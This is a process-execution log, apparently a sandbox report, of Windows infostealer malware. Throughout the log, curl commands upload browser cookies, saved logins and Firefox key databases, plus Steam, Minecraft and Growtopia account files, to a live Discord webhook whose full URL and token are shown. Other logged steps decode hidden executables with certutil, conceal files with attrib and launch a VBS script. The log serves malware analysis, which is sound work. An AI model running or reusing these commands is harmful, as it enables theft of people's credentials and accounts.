C:\Windows\system32\curl.execurl --silent --output /dev/null -F tasks=@"Network Persistent State" https://discord.com/api/webhooks/1213007591198818315/uhbDkZUnvFr29Pwrn7ORn2PpRG8pUODi2xcD0mFtZDN3DfT4l5MMsAE9RZptiaKeGosY4⤵
-
C:\Windows\system32\curl.execurl --silent --output /dev/null -F tasks=@"NetworkDataMigrated" https://discord.com/api/webhooks/1213007591198818315/uhbDkZUnvFr29Pwrn7ORn2PpRG8pUODi2xcD0mFtZDN3DfT4l5MMsAE9RZptiaKeGosY4⤵
-
C:\Windows\system32\curl.execurl --silent --output /dev/null -F tasks=@"Reporting and NEL" https://discord.com/api/webhooks/1213007591198818315/uhbDkZUnvFr29Pwrn7ORn2PpRG8pUODi2xcD0mFtZDN3DfT4l5MMsAE9RZptiaKeGosY4⤵
-
C:\Windows\system32\curl.execurl --silent --output /dev/null -F tasks=@"Reporting and NEL-journal" https://discord.com/api/webhooks/1213007591198818315/uhbDkZUnvFr29Pwrn7ORn2PpRG8pUODi2xcD0mFtZDN3DfT4l5MMsAE9RZptiaKeGosY4⤵
-
C:\Windows\system32\curl.execurl --silent --output /dev/null -F tasks=@"SCT Auditing Pending Reports" https://discord.com/api/webhooks/1213007591198818315/uhbDkZUnvFr29Pwrn7ORn2PpRG8pUODi2xcD0mFtZDN3DfT4l5MMsAE9RZptiaKeGosY4⤵
-
C:\Windows\system32\curl.execurl --silent --output /dev/null -F tasks=@"Sdch Dictionaries" https://discord.com/api/webhooks/1213007591198818315/uhbDkZUnvFr29Pwrn7ORn2PpRG8pUODi2xcD0mFtZDN3DfT4l5MMsAE9RZptiaKeGosY4⤵
-
C:\Windows\system32\curl.execurl --silent --output /dev/null -F tasks=@"TransportSecurity" https://discord.com/api/webhooks/1213007591198818315/uhbDkZUnvFr29Pwrn7ORn2PpRG8pUODi2xcD0mFtZDN3DfT4l5MMsAE9RZptiaKeGosY4⤵
-
C:\Windows\system32\curl.execurl --silent --output /dev/null -F tasks=@"Trust Tokens" https://discord.com/api/webhooks/1213007591198818315/uhbDkZUnvFr29Pwrn7ORn2PpRG8pUODi2xcD0mFtZDN3DfT4l5MMsAE9RZptiaKeGosY4⤵
-
C:\Windows\system32\curl.execurl --silent --output /dev/null -F tasks=@"Trust Tokens-journal" https://discord.com/api/webhooks/1213007591198818315/uhbDkZUnvFr29Pwrn7ORn2PpRG8pUODi2xcD0mFtZDN3DfT4l5MMsAE9RZptiaKeGosY4⤵
-
C:\Windows\system32\curl.execurl --silent --output /dev/null -i -H "Accept: application/json" -H "Content-Type:application/json" -X POST --data "{\"content\": \"```- CHROME // from Admin - 10.127.0.105 @ 12:31:58.98```\"}" https://discord.com/api/webhooks/1213007591198818315/uhbDkZUnvFr29Pwrn7ORn2PpRG8pUODi2xcD0mFtZDN3DfT4l5MMsAE9RZptiaKeGosY4⤵
-
C:\Windows\system32\curl.execurl --silent --output /dev/null -F tasks=@"Cookies" https://discord.com/api/webhooks/1213007591198818315/uhbDkZUnvFr29Pwrn7ORn2PpRG8pUODi2xcD0mFtZDN3DfT4l5MMsAE9RZptiaKeGosY4⤵
-
C:\Windows\system32\curl.execurl --silent --output /dev/null -F tasks=@"Cookies-journal" https://discord.com/api/webhooks/1213007591198818315/uhbDkZUnvFr29Pwrn7ORn2PpRG8pUODi2xcD0mFtZDN3DfT4l5MMsAE9RZptiaKeGosY4⤵
-
C:\Windows\system32\curl.execurl --silent --output /dev/null -F tasks=@"Network Persistent State" https://discord.com/api/webhooks/1213007591198818315/uhbDkZUnvFr29Pwrn7ORn2PpRG8pUODi2xcD0mFtZDN3DfT4l5MMsAE9RZptiaKeGosY4⤵
-
C:\Windows\system32\curl.execurl --silent --output /dev/null -F tasks=@"NetworkDataMigrated" https://discord.com/api/webhooks/1213007591198818315/uhbDkZUnvFr29Pwrn7ORn2PpRG8pUODi2xcD0mFtZDN3DfT4l5MMsAE9RZptiaKeGosY4⤵
-
C:\Windows\system32\curl.execurl --silent --output /dev/null -F tasks=@"Reporting and NEL" https://discord.com/api/webhooks/1213007591198818315/uhbDkZUnvFr29Pwrn7ORn2PpRG8pUODi2xcD0mFtZDN3DfT4l5MMsAE9RZptiaKeGosY4⤵
-
C:\Windows\system32\curl.execurl --silent --output /dev/null -F tasks=@"Reporting and NEL-journal" https://discord.com/api/webhooks/1213007591198818315/uhbDkZUnvFr29Pwrn7ORn2PpRG8pUODi2xcD0mFtZDN3DfT4l5MMsAE9RZptiaKeGosY4⤵
-
C:\Windows\system32\curl.execurl --silent --output /dev/null -F tasks=@"SCT Auditing Pending Reports" https://discord.com/api/webhooks/1213007591198818315/uhbDkZUnvFr29Pwrn7ORn2PpRG8pUODi2xcD0mFtZDN3DfT4l5MMsAE9RZptiaKeGosY4⤵
-
C:\Windows\system32\curl.execurl --silent --output /dev/null -F tasks=@"TransportSecurity" https://discord.com/api/webhooks/1213007591198818315/uhbDkZUnvFr29Pwrn7ORn2PpRG8pUODi2xcD0mFtZDN3DfT4l5MMsAE9RZptiaKeGosY4⤵
-
C:\Windows\system32\curl.execurl --silent --output /dev/null -F h=@"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\History" https://discord.com/api/webhooks/1213007591198818315/uhbDkZUnvFr29Pwrn7ORn2PpRG8pUODi2xcD0mFtZDN3DfT4l5MMsAE9RZptiaKeGosY4⤵
-
C:\Windows\system32\timeout.exetimeout /t 1 /nobreak4⤵
-
C:\Windows\system32\curl.execurl --silent --output /dev/null -F s=@"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Shortcuts" https://discord.com/api/webhooks/1213007591198818315/uhbDkZUnvFr29Pwrn7ORn2PpRG8pUODi2xcD0mFtZDN3DfT4l5MMsAE9RZptiaKeGosY4⤵
-
C:\Windows\system32\curl.execurl --silent --output /dev/null -F b=@"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Bookmarks" https://discord.com/api/webhooks/1213007591198818315/uhbDkZUnvFr29Pwrn7ORn2PpRG8pUODi2xcD0mFtZDN3DfT4l5MMsAE9RZptiaKeGosY4⤵
-
C:\Windows\system32\curl.execurl --silent --output /dev/null -F l=@"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Login Data" https://discord.com/api/webhooks/1213007591198818315/uhbDkZUnvFr29Pwrn7ORn2PpRG8pUODi2xcD0mFtZDN3DfT4l5MMsAE9RZptiaKeGosY4⤵
-
C:\Windows\system32\timeout.exetimeout /t 1 /nobreak4⤵
-
C:\Windows\system32\curl.execurl --silent --output /dev/null -F l=@"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State" https://discord.com/api/webhooks/1213007591198818315/uhbDkZUnvFr29Pwrn7ORn2PpRG8pUODi2xcD0mFtZDN3DfT4l5MMsAE9RZptiaKeGosY4⤵
-
C:\Windows\system32\timeout.exetimeout /t 1 /nobreak4⤵
-
C:\Windows\system32\curl.execurl --silent --output /dev/null -i -H "Accept: application/json" -H "Content-Type:application/json" -X POST --data "{\"content\": \"```- OPERA // from Admin - 10.127.0.105 @ 12:32:09.11```\"}" https://discord.com/api/webhooks/1213007591198818315/uhbDkZUnvFr29Pwrn7ORn2PpRG8pUODi2xcD0mFtZDN3DfT4l5MMsAE9RZptiaKeGosY4⤵
-
C:\Windows\system32\curl.execurl --silent --output /dev/null -F c=@"C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Cookies" https://discord.com/api/webhooks/1213007591198818315/uhbDkZUnvFr29Pwrn7ORn2PpRG8pUODi2xcD0mFtZDN3DfT4l5MMsAE9RZptiaKeGosY4⤵
-
C:\Windows\system32\curl.execurl --silent --output /dev/null -F h=@"C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\History" https://discord.com/api/webhooks/1213007591198818315/uhbDkZUnvFr29Pwrn7ORn2PpRG8pUODi2xcD0mFtZDN3DfT4l5MMsAE9RZptiaKeGosY4⤵
-
C:\Windows\system32\timeout.exetimeout /t 1 /nobreak4⤵
-
C:\Windows\system32\curl.execurl --silent --output /dev/null -F s=@"C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Shortcuts" https://discord.com/api/webhooks/1213007591198818315/uhbDkZUnvFr29Pwrn7ORn2PpRG8pUODi2xcD0mFtZDN3DfT4l5MMsAE9RZptiaKeGosY4⤵
-
C:\Windows\system32\curl.execurl --silent --output /dev/null -F b=@"C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Bookmarks" https://discord.com/api/webhooks/1213007591198818315/uhbDkZUnvFr29Pwrn7ORn2PpRG8pUODi2xcD0mFtZDN3DfT4l5MMsAE9RZptiaKeGosY4⤵
-
C:\Windows\system32\curl.execurl --silent --output /dev/null -F l=@"C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Login Data" https://discord.com/api/webhooks/1213007591198818315/uhbDkZUnvFr29Pwrn7ORn2PpRG8pUODi2xcD0mFtZDN3DfT4l5MMsAE9RZptiaKeGosY4⤵
-
C:\Windows\system32\timeout.exetimeout /t 1 /nobreak4⤵
-
C:\Windows\system32\curl.execurl --silent --output /dev/null -i -H "Accept: application/json" -H "Content-Type:application/json" -X POST --data "{\"content\": \"```- VIVALDI // from Admin - 10.127.0.105 @ 12:32:11.22```\"}" https://discord.com/api/webhooks/1213007591198818315/uhbDkZUnvFr29Pwrn7ORn2PpRG8pUODi2xcD0mFtZDN3DfT4l5MMsAE9RZptiaKeGosY4⤵
-
C:\Windows\system32\curl.execurl --silent --output /dev/null -F c=@"C:\Users\Admin\AppData\Local\Vivaldi\User Data\Default\Cookies" https://discord.com/api/webhooks/1213007591198818315/uhbDkZUnvFr29Pwrn7ORn2PpRG8pUODi2xcD0mFtZDN3DfT4l5MMsAE9RZptiaKeGosY4⤵
-
C:\Windows\system32\curl.execurl --silent --output /dev/null -F h=@"C:\Users\Admin\AppData\Local\Vivaldi\User Data\Default\History" https://discord.com/api/webhooks/1213007591198818315/uhbDkZUnvFr29Pwrn7ORn2PpRG8pUODi2xcD0mFtZDN3DfT4l5MMsAE9RZptiaKeGosY4⤵
-
C:\Windows\system32\timeout.exetimeout /t 1 /nobreak4⤵
- Delays execution with timeout.exe
-
C:\Windows\system32\curl.execurl --silent --output /dev/null -F s=@"C:\Users\Admin\AppData\Local\Vivaldi\User Data\Default\Shortcuts" https://discord.com/api/webhooks/1213007591198818315/uhbDkZUnvFr29Pwrn7ORn2PpRG8pUODi2xcD0mFtZDN3DfT4l5MMsAE9RZptiaKeGosY4⤵
-
C:\Windows\system32\curl.execurl --silent --output /dev/null -F b=@"C:\Users\Admin\AppData\Local\Vivaldi\User Data\Default\Bookmarks" https://discord.com/api/webhooks/1213007591198818315/uhbDkZUnvFr29Pwrn7ORn2PpRG8pUODi2xcD0mFtZDN3DfT4l5MMsAE9RZptiaKeGosY4⤵
-
C:\Windows\system32\curl.execurl --silent --output /dev/null -F l=@"C:\Users\Admin\AppData\Local\Vivaldi\User Data\Default\Login Data" https://discord.com/api/webhooks/1213007591198818315/uhbDkZUnvFr29Pwrn7ORn2PpRG8pUODi2xcD0mFtZDN3DfT4l5MMsAE9RZptiaKeGosY4⤵
-
C:\Windows\system32\timeout.exetimeout /t 1 /nobreak4⤵
-
C:\Windows\system32\curl.execurl --silent --output /dev/null -i -H "Accept: application/json" -H "Content-Type:application/json" -X POST --data "{\"content\": \"```- FIREFOX // from Admin - 10.127.0.105 @ 12:32:13.11```\"}" https://discord.com/api/webhooks/1213007591198818315/uhbDkZUnvFr29Pwrn7ORn2PpRG8pUODi2xcD0mFtZDN3DfT4l5MMsAE9RZptiaKeGosY4⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c 2>NUL dir /b "C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles"4⤵
-
C:\Windows\system32\curl.execurl --silent --output /dev/null -F level=@"C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\kwvh0l1k.Admin\logins.json" https://discord.com/api/webhooks/1213007591198818315/uhbDkZUnvFr29Pwrn7ORn2PpRG8pUODi2xcD0mFtZDN3DfT4l5MMsAE9RZptiaKeGosY4⤵
-
C:\Windows\system32\timeout.exetimeout /t 1 /nobreak4⤵
- Delays execution with timeout.exe
-
C:\Windows\system32\curl.execurl --silent --output /dev/null -F level=@"C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\kwvh0l1k.Admin\key3.db" https://discord.com/api/webhooks/1213007591198818315/uhbDkZUnvFr29Pwrn7ORn2PpRG8pUODi2xcD0mFtZDN3DfT4l5MMsAE9RZptiaKeGosY4⤵
-
C:\Windows\system32\curl.execurl --silent --output /dev/null -F level=@"C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\kwvh0l1k.Admin\key4.db" https://discord.com/api/webhooks/1213007591198818315/uhbDkZUnvFr29Pwrn7ORn2PpRG8pUODi2xcD0mFtZDN3DfT4l5MMsAE9RZptiaKeGosY4⤵
-
C:\Windows\system32\curl.execurl --silent --output /dev/null -F level=@"C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\kwvh0l1k.Admin\cookies.sqlite" https://discord.com/api/webhooks/1213007591198818315/uhbDkZUnvFr29Pwrn7ORn2PpRG8pUODi2xcD0mFtZDN3DfT4l5MMsAE9RZptiaKeGosY4⤵
-
C:\Windows\system32\timeout.exetimeout /t 1 /nobreak4⤵
- Delays execution with timeout.exe
-
C:\Windows\system32\curl.execurl --silent --output /dev/null -F level=@"C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\n9vxbo99.default-release\logins.json" https://discord.com/api/webhooks/1213007591198818315/uhbDkZUnvFr29Pwrn7ORn2PpRG8pUODi2xcD0mFtZDN3DfT4l5MMsAE9RZptiaKeGosY4⤵
-
C:\Windows\system32\timeout.exetimeout /t 1 /nobreak4⤵
-
C:\Windows\system32\curl.execurl --silent --output /dev/null -F level=@"C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\n9vxbo99.default-release\key3.db" https://discord.com/api/webhooks/1213007591198818315/uhbDkZUnvFr29Pwrn7ORn2PpRG8pUODi2xcD0mFtZDN3DfT4l5MMsAE9RZptiaKeGosY4⤵
-
C:\Windows\system32\curl.execurl --silent --output /dev/null -F level=@"C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\n9vxbo99.default-release\key4.db" https://discord.com/api/webhooks/1213007591198818315/uhbDkZUnvFr29Pwrn7ORn2PpRG8pUODi2xcD0mFtZDN3DfT4l5MMsAE9RZptiaKeGosY4⤵
-
C:\Windows\system32\curl.execurl --silent --output /dev/null -F level=@"C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\n9vxbo99.default-release\cookies.sqlite" https://discord.com/api/webhooks/1213007591198818315/uhbDkZUnvFr29Pwrn7ORn2PpRG8pUODi2xcD0mFtZDN3DfT4l5MMsAE9RZptiaKeGosY4⤵
-
C:\Windows\system32\timeout.exetimeout /t 1 /nobreak4⤵
- Delays execution with timeout.exe
-
C:\Windows\system32\curl.execurl --silent --output /dev/null -i -H "Accept: application/json" -H "Content-Type:application/json" -X POST --data "{\"content\": \"```- osu! // from Admin - 10.127.0.105 @ 12:32:18.13```\"}" https://discord.com/api/webhooks/1213007591198818315/uhbDkZUnvFr29Pwrn7ORn2PpRG8pUODi2xcD0mFtZDN3DfT4l5MMsAE9RZptiaKeGosY4⤵
-
C:\Windows\system32\curl.execurl --silent --output /dev/null -F c=@"C:\Users\Admin\AppData\Local\osu!\osu!.Admin.cfwh4⤵
-
C:\Windows\system32\curl.execurl --silent --output /dev/null -i -H "Accept: application/json" -H "Content-Type:application/json" -X POST --data "{\"content\": \"```- DISCORD // from Admin - 10.127.0.105 @ 12:32:18.49```\"}" https://discord.com/api/webhooks/1213007591198818315/uhbDkZUnvFr29Pwrn7ORn2PpRG8pUODi2xcD0mFtZDN3DfT4l5MMsAE9RZptiaKeGosY4⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c 2>NUL dir /b "C:\Users\Admin\AppData\Roaming\discord\Local Storage\leveldb\"4⤵
-
C:\Windows\system32\curl.execurl --silent --output /dev/null -i -H "Accept: application/json" -H "Content-Type:application/json" -X POST --data "{\"content\": \"```- STEAM // from Admin - 10.127.0.105 @ 12:32:18.99```\"}" https://discord.com/api/webhooks/1213007591198818315/uhbDkZUnvFr29Pwrn7ORn2PpRG8pUODi2xcD0mFtZDN3DfT4l5MMsAE9RZptiaKeGosY4⤵
-
C:\Windows\system32\curl.execurl --silent --output /dev/null -F steamusers=@"C:\Program Files (x86)\Steam\config\loginusers.vdf" https://discord.com/api/webhooks/1213007591198818315/uhbDkZUnvFr29Pwrn7ORn2PpRG8pUODi2xcD0mFtZDN3DfT4l5MMsAE9RZptiaKeGosY4⤵
-
C:\Windows\system32\curl.execurl --silent --output /dev/null -F loginusers=@"C:\Program Files\Steam\config\loginusers.vdf" https://discord.com/api/webhooks/1213007591198818315/uhbDkZUnvFr29Pwrn7ORn2PpRG8pUODi2xcD0mFtZDN3DfT4l5MMsAE9RZptiaKeGosY4⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c 2>NUL dir /b "C:\Program Files (x86)\Steam\"4⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c 2>NUL dir /b "C:\Program Files\Steam\"4⤵
-
C:\Windows\system32\curl.execurl --silent --output /dev/null -i -H "Accept: application/json" -H "Content-Type:application/json" -X POST --data "{\"content\": \"```- MINECRAFT // from Admin - 10.127.0.105 @ 12:32:19.58```\"}" https://discord.com/api/webhooks/1213007591198818315/uhbDkZUnvFr29Pwrn7ORn2PpRG8pUODi2xcD0mFtZDN3DfT4l5MMsAE9RZptiaKeGosY4⤵
-
C:\Windows\system32\curl.execurl --silent --output /dev/null -F steamusers=@"C:\Users\Admin\AppData\Roaming\.minecraft\launcher_profiles.json" https://discord.com/api/webhooks/1213007591198818315/uhbDkZUnvFr29Pwrn7ORn2PpRG8pUODi2xcD0mFtZDN3DfT4l5MMsAE9RZptiaKeGosY4⤵
-
C:\Windows\system32\curl.execurl --silent --output /dev/null -F steamusers=@"C:\Users\Admin\AppData\Roaming\.minecraft\launcher_accounts.json" https://discord.com/api/webhooks/1213007591198818315/uhbDkZUnvFr29Pwrn7ORn2PpRG8pUODi2xcD0mFtZDN3DfT4l5MMsAE9RZptiaKeGosY4⤵
-
C:\Windows\system32\timeout.exetimeout /t 1 /nobreak4⤵
-
C:\Windows\system32\curl.execurl --silent --output /dev/null -i -H "Accept: application/json" -H "Content-Type:application/json" -X POST --data "{\"content\": \"```- GROWTOPIA // from Admin - 10.127.0.105 @ 12:32:21.19```\"}" https://discord.com/api/webhooks/1213007591198818315/uhbDkZUnvFr29Pwrn7ORn2PpRG8pUODi2xcD0mFtZDN3DfT4l5MMsAE9RZptiaKeGosY4⤵
-
C:\Windows\system32\curl.execurl --silent --output /dev/null -F save.dat=@"C:\Users\Admin\AppData\Local\Growtopia\save.dat" https://discord.com/api/webhooks/1213007591198818315/uhbDkZUnvFr29Pwrn7ORn2PpRG8pUODi2xcD0mFtZDN3DfT4l5MMsAE9RZptiaKeGosY4⤵
-
C:\Windows\system32\attrib.exeAttrib +h +s hdiwhduewih291.tmp4⤵
-
C:\Windows\system32\certutil.execertutil -decode hdiwhduewih291.tmp s.exe4⤵
-
C:\Windows\system32\timeout.exetimeout 2 /nobreak4⤵
-
C:\Windows\system32\attrib.exeAttrib +h +s s.exe4⤵
-
C:\Windows\system32\attrib.exeAttrib -h -s hdiwhduewih291.tmp4⤵
-
C:\Windows\system32\attrib.exeAttrib +h +s monitor.bat4⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\6578254637456475426.vbs"4⤵
- Checks computer location settings
- Loads dropped DLL
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\monitor.bat" "5⤵
-
C:\Windows\system32\timeout.exetimeout 16⤵
-
C:\Windows\system32\timeout.exetimeout 16⤵
- Delays execution with timeout.exe
-
C:\Windows\system32\timeout.exetimeout 26⤵
-
C:\Windows\system32\timeout.exetimeout 26⤵
-
C:\Windows\system32\timeout.exetimeout 26⤵
- Delays execution with timeout.exe
-
C:\Windows\system32\timeout.exetimeout 26⤵
-
C:\Windows\system32\timeout.exetimeout 26⤵
-
C:\Windows\system32\timeout.exetimeout 26⤵
- Delays execution with timeout.exe
-
C:\Windows\system32\timeout.exetimeout 26⤵
-
C:\Windows\system32\timeout.exetimeout 26⤵
- Delays execution with timeout.exe
-
C:\Windows\system32\timeout.exetimeout 26⤵
- Delays execution with timeout.exe
-
C:\Windows\system32\timeout.exetimeout 26⤵
-
C:\Windows\system32\timeout.exetimeout 26⤵
-
C:\Windows\system32\timeout.exetimeout 26⤵
- Delays execution with timeout.exe
-
C:\Windows\system32\timeout.exetimeout 26⤵
-
C:\Windows\system32\timeout.exetimeout 26⤵
- Delays execution with timeout.exe
-
C:\Windows\system32\timeout.exetimeout 26⤵
- Delays execution with timeout.exe
-
C:\Windows\system32\timeout.exetimeout 26⤵
-
C:\Windows\system32\timeout.exetimeout 26⤵
- Delays execution with timeout.exe
-
C:\Windows\system32\timeout.exetimeout 2 /nobreak4⤵
- Delays execution with timeout.exe
-
C:\Windows\system32\attrib.exeAttrib +h +s Do_Not_Delete..file4⤵
-
C:\Windows\system32\certutil.execertutil -decode Do_Not_Delete..file System.exe4⤵
-
C:\Windows\system32\timeout.exetimeout 2 /nobreak4⤵
-
C:\Windows\system32\attrib.exeAttrib +h +s System.exe4⤵
-
C:\Windows\system32\attrib.exeAttrib -h -s Do_Not_Delete..file4⤵
-
C:\Windows\system32\mode.commode con cols=150 lines=304⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c dir /b /s *.jpg4⤵
-
C:\Windows\system32\attrib.exeattrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"4⤵
-
C:\Windows\system32\attrib.exeattrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"4⤵
-
C:\Windows\system32\attrib.exeattrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"4⤵
-
C:\Windows\system32\attrib.exeattrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"4⤵
-
C:\Windows\system32\attrib.exeattrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"4⤵
-
C:\Windows\system32\attrib.exeattrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"4⤵
-
C:\Windows\system32\attrib.exeattrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"4⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c dir /b /s *.mp34⤵
-
C:\Windows\system32\attrib.exeattrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"4⤵
-
C:\Windows\system32\attrib.exeattrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"4⤵
-
C:\Windows\system32\attrib.exeattrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"4⤵
- Views/modifies file attributes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c dir /b /s *.mp44⤵
-
C:\Windows\system32\attrib.exeattrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"4⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c dir /b /s *.gif4⤵
-
C:\Windows\system32\attrib.exeattrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"4⤵
-
C:\Windows\system32\attrib.exeattrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"4⤵
-
C:\Windows\system32\attrib.exeattrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"4⤵
-
C:\Windows\system32\attrib.exeattrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"4⤵
-
C:\Windows\system32\attrib.exeattrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"4⤵
-
C:\Windows\system32\attrib.exeattrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"4⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c dir /b /s *.txt4⤵
-
C:\Windows\system32\attrib.exeattrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"4⤵
-
C:\Windows\system32\attrib.exeattrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"4⤵
-
C:\Windows\system32\attrib.exeattrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"4⤵
-
C:\Windows\system32\attrib.exeattrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"4⤵
-
C:\Windows\system32\attrib.exeattrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"4⤵
-
C:\Windows\system32\attrib.exeattrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"4⤵
-
C:\Windows\system32\attrib.exeattrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"4⤵
- Views/modifies file attributes
-
C:\Windows\system32\attrib.exeattrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"4⤵
-
C:\Windows\system32\attrib.exeattrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"4⤵
-
C:\Windows\system32\attrib.exeattrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"4⤵
-
C:\Windows\system32\attrib.exeattrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"4⤵
-
C:\Windows\system32\attrib.exeattrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"4⤵
-
C:\Windows\system32\attrib.exeattrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"4⤵
-
C:\Windows\system32\attrib.exeattrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"4⤵
-
C:\Windows\system32\attrib.exeattrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"4⤵
-
C:\Windows\system32\attrib.exeattrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"4⤵
-
C:\Windows\system32\attrib.exeattrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"4⤵
-
C:\Windows\system32\attrib.exeattrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"4⤵
-
C:\Windows\system32\attrib.exeattrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"4⤵
-
C:\Windows\system32\attrib.exeattrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"4⤵
-
C:\Windows\system32\attrib.exeattrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"4⤵
-
C:\Windows\system32\attrib.exeattrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"4⤵
-
C:\Windows\system32\attrib.exeattrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"4⤵
-
C:\Windows\system32\attrib.exeattrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"4⤵
-
C:\Windows\system32\attrib.exeattrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"4⤵
-
C:\Windows\system32\attrib.exeattrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"4⤵
-
C:\Windows\system32\attrib.exeattrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"4⤵
- Views/modifies file attributes
-
C:\Windows\system32\attrib.exeattrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"4⤵
-
C:\Windows\system32\attrib.exeattrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"4⤵
-
C:\Windows\system32\attrib.exeattrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"4⤵
-
C:\Windows\system32\attrib.exeattrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"4⤵
-
C:\Windows\system32\attrib.exeattrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"4⤵
-
C:\Windows\system32\attrib.exeattrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"4⤵
-
C:\Windows\system32\attrib.exeattrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"4⤵
-
C:\Windows\system32\attrib.exeattrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"4⤵
-
